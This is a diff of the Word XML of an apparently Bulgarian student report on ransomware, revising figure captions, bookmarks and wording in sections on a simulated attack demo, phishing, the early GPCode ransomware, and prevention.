+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>12</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -6918,14 +7647,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>13</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>13</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -6950,14 +7692,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>14</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>14</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -6981,7 +7736,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc223468476"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc223545532"/>
       <w:r>
         <w:t>Стартиране на демото:</w:t>
       </w:r>
@@ -7039,14 +7794,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>15</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>15</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Какво се визуализира първо на потребителя</w:t>
       </w:r>
@@ -7167,14 +7935,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>16</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Симулация на атаката. Файловете са криптирани. Потребителят трябва да потвърди, че е заплатил.</w:t>
       </w:r>
@@ -7199,14 +7980,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>17</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>17</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -7240,14 +8034,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>18</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>18</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -7278,14 +8085,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>19</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>19</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -7319,10 +8139,13 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc223468477"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc223545533"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Жертвата е заплатила откупа:</w:t>
+        <w:t xml:space="preserve">Потърпевшият </w:t>
+      </w:r>
+      <w:r>
+        <w:t>е заплатил откупа:</w:t>
       </w:r>
       <w:bookmarkEnd w:id="21"/>
     </w:p>
@@ -7424,14 +8247,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>20</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>20</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Файловете са възстановени</w:t>
       </w:r>
@@ -7461,14 +8297,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>21</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>21</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>:</w:t>
       </w:r>
@@ -7501,14 +8350,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>22</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>22</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -7538,14 +8400,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>23</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>23</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -7575,7 +8450,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc223468478"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc223545534"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -7659,7 +8534,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc223468479"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc223545535"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Стратегии и защита от </w:t>
@@ -7721,7 +8596,7 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc223468480"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc223545536"/>
       <w:r>
         <w:t xml:space="preserve">Подготовка за </w:t>
       </w:r>
@@ -7935,7 +8810,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc223468481"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc223545537"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Превенция </w:t>
@@ -8288,14 +9163,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>24</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>24</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8345,13 +9233,27 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> на internet-facing vulnerabilities. </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> internet-facing vulnerabilities. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>Експлоатация</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -8359,7 +9261,21 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> на </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -8433,14 +9349,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>25</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>25</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>: Д</w:t>
       </w:r>
@@ -8480,7 +9409,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="_Toc223468482"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc223545538"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Компрометирани </w:t>
@@ -8902,14 +9831,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>26</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>26</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -8932,7 +9874,7 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="30" w:name="_Toc223468483"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc223545539"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -9192,14 +10134,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>27</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>27</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -9227,7 +10182,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="32" w:name="_Toc223468484"/>
+      <w:bookmarkStart w:id="32" w:name="_Toc223545540"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Други форми на </w:t>
@@ -9455,7 +10410,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="33" w:name="_Toc223468485"/>
+      <w:bookmarkStart w:id="33" w:name="_Toc223545541"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Какво да направим, ако станем жертва на</w:t>
@@ -9817,7 +10772,7 @@
         <w:br w:type="page"/>
       </w:r>
     </w:p>
-    <w:bookmarkStart w:id="34" w:name="_Toc223468486" w:displacedByCustomXml="next"/>
+    <w:bookmarkStart w:id="34" w:name="_Toc223545542" w:displacedByCustomXml="next"/>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
@@ -12309,6 +13264,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -13152,12 +14108,11 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
 </file>
 
 <file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
@@ -13356,11 +14311,12 @@
 </file>
 
 <file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
 </file>
 
 <file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
@@ -13524,9 +14480,11 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2A65B6-C891-4DE3-96AA-342988F8CBF9}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>
@@ -13551,11 +14509,9 @@
 </file>
 
 <file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C2A65B6-C891-4DE3-96AA-342988F8CBF9}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>

--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -372,28 +372,7 @@
           <w:szCs w:val="32"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Курсов</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="en-US"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>проект</w:t>
+        <w:t>Реферат</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2921,9 +2900,6 @@
         <w:t xml:space="preserve"> реклами, линкове, уеб страници с вложени злокачествени софтуери. В </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
         <w:t>реферата</w:t>
       </w:r>
       <w:r>
@@ -3310,10 +3286,7 @@
         <w:t>очти невъзможн</w:t>
       </w:r>
       <w:r>
-        <w:t>о е п</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">реводите </w:t>
+        <w:t xml:space="preserve">о е преводите </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">да бъдат спрени, замразени, върнати или проследени от институциите.  </w:t>
@@ -4219,10 +4192,7 @@
         <w:t xml:space="preserve"> единия ключ да е </w:t>
       </w:r>
       <w:r>
-        <w:t>много трудно</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">много трудно </w:t>
       </w:r>
       <w:r>
         <w:t>математически да бъде изчислен какъв е другия</w:t>
@@ -4650,7 +4620,13 @@
         <w:t>phishing</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> атака, при която се таргетира точно определен човек, група или организация. Обикновено целта им е извличане на лична информация, сваляне и </w:t>
+        <w:t xml:space="preserve"> атака, при която се таргетира точно определен човек, група или организация. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Ц</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">елта е извличане на лична информация, сваляне и </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">инсталация </w:t>
@@ -4659,10 +4635,25 @@
         <w:t xml:space="preserve">на вируси или изпращане на определена сума </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">капитал </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">на хакера. Постигат го чрез изграждане на фалшиви истории или сценарии. Често фишинг заплахите са прикачени в имейли, социални мрежи, текстови съобщения или телефонни разговори. </w:t>
+        <w:t>капитал</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> до престъпниците</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Постигат </w:t>
+      </w:r>
+      <w:r>
+        <w:t>целите си</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> чрез изграждане на фалшиви истории или сценарии. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Ф</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ишинг заплахите са прикачени в имейли, социални мрежи, текстови съобщения или телефонни разговори. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4671,7 +4662,19 @@
         <w:t xml:space="preserve">Spear phishing </w:t>
       </w:r>
       <w:r>
-        <w:t>атаките е най-ефективната форма на атака, понеже измамата е пригодена да бъде максимално убедителна за конкретно лице.</w:t>
+        <w:t>атак</w:t>
+      </w:r>
+      <w:r>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:t>т</w:t>
+      </w:r>
+      <w:r>
+        <w:t>а</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е най-ефективната форма на атака, понеже измамата е пригодена да бъде максимално убедителна за конкретно лице.</w:t>
       </w:r>
       <w:sdt>
         <w:sdtPr>
@@ -4715,7 +4718,13 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">През 2006 година се появява първия </w:t>
+        <w:t>През 2006 година се появява първия</w:t>
+      </w:r>
+      <w:r>
+        <w:t>т</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4735,16 +4744,25 @@
         <w:t xml:space="preserve"> се разпространява през електронни пощи като прикачен файл под формата на заявление за работа. </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Променя се </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>desktop background</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, като е изписано съобщението, че системата е пробита и че е прикачен файл с инструкции (фиг. 5 и 6).</w:t>
+        <w:t>Променя се</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> тапета на десктопа</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, като е изписано съобщението, че системата е пробита и че е прикачен файл с инструкции (фиг. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:r>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>).</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -4816,17 +4834,43 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>GpCode</w:t>
+        <w:t>G</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Code</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">е че файловете, които се криптират се запазват на нова локация, а некриптираните се изтриват. </w:t>
